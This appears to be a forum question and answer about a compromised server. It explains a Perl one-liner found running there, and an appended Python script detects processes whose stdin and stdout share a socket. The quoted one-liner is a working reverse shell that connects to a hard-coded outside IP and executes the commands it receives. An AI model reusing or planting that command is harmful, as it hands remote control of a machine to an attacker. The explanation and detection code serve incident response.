My server got hacked, and ps aux shows that it's running this program now:
perl -MIO -e $p=fork;exit,if($p);$c=new IO::Socket::INET (PeerAddr,"169.50.9.58:1212");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
I don't know Perl...what is this program doing?
It opens a socket to that IP. Then it sets up the STDIN to read from it and the STDOUT to go to it. So it builds a direct communication channel between the process and that IP.
Then it goes into a while loop in which it runs via system whatever comes through STDIN.
It does this in a forked process, fire-and-forget (detached) style, where the parent exits right away. So this executes and exits and there is another process that talks with that IP and runs commands.
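The behaviour described in the answer leaves a visible trace on Linux: the detached process has file descriptors 0 and 1 pointing at the same socket. The following is an added triage example, not part of the original question or answer; it assumes a Linux-style /proc layout, and the function names and the sample tree built in demo() are constructed for illustration.

```python
import os
import tempfile

def socket_stdio_processes(proc_root="/proc"):
    """Return sorted (pid, socket_inode, cmdline) for every process whose
    stdin (fd 0) and stdout (fd 1) are the same socket."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        base = os.path.join(proc_root, entry)
        try:
            fd0 = os.readlink(os.path.join(base, "fd", "0"))
            fd1 = os.readlink(os.path.join(base, "fd", "1"))
        except OSError:
            continue  # process already exited, or we lack permission
        # /proc renders a socket descriptor as "socket:[<inode>]"
        if not (fd0.startswith("socket:[") and fd0 == fd1):
            continue
        try:
            with open(os.path.join(base, "cmdline"), "rb") as fh:
                raw = fh.read()
        except OSError:
            raw = b""
        cmd = raw.replace(b"\0", b" ").decode("utf-8", "replace").strip()
        hits.append((int(entry), fd0[8:-1], cmd))
    return sorted(hits)

def demo():
    """Build a constructed /proc-like tree and scan it (sample data only)."""
    root = tempfile.mkdtemp()
    samples = {  # pid: (fd 0 target, fd 1 target, cmdline) -- all constructed
        "4242": ("socket:[31337]", "socket:[31337]", b"perl\0-MIO\0-e\0(one-liner)\0"),
        "900": ("/dev/pts/0", "/dev/pts/0", b"bash\0"),
        "901": ("pipe:[555]", "socket:[777]", b"worker\0"),
    }
    for pid, (fd0, fd1, cmd) in samples.items():
        fd_dir = os.path.join(root, pid, "fd")
        os.makedirs(fd_dir)
        os.symlink(fd0, os.path.join(fd_dir, "0"))  # dangling link, like /proc
        os.symlink(fd1, os.path.join(fd_dir, "1"))
        with open(os.path.join(root, pid, "cmdline"), "wb") as fh:
            fh.write(cmd)
    return socket_stdio_processes(root)

if __name__ == "__main__":
    for pid, inode, cmd in socket_stdio_processes():
        print(f"pid={pid} socket_inode={inode} cmd={cmd}")
```

A hit is a lead for review rather than a verdict, since inetd-style services also hand a socket to their children as stdin and stdout; run it as root so other users' fd directories are readable.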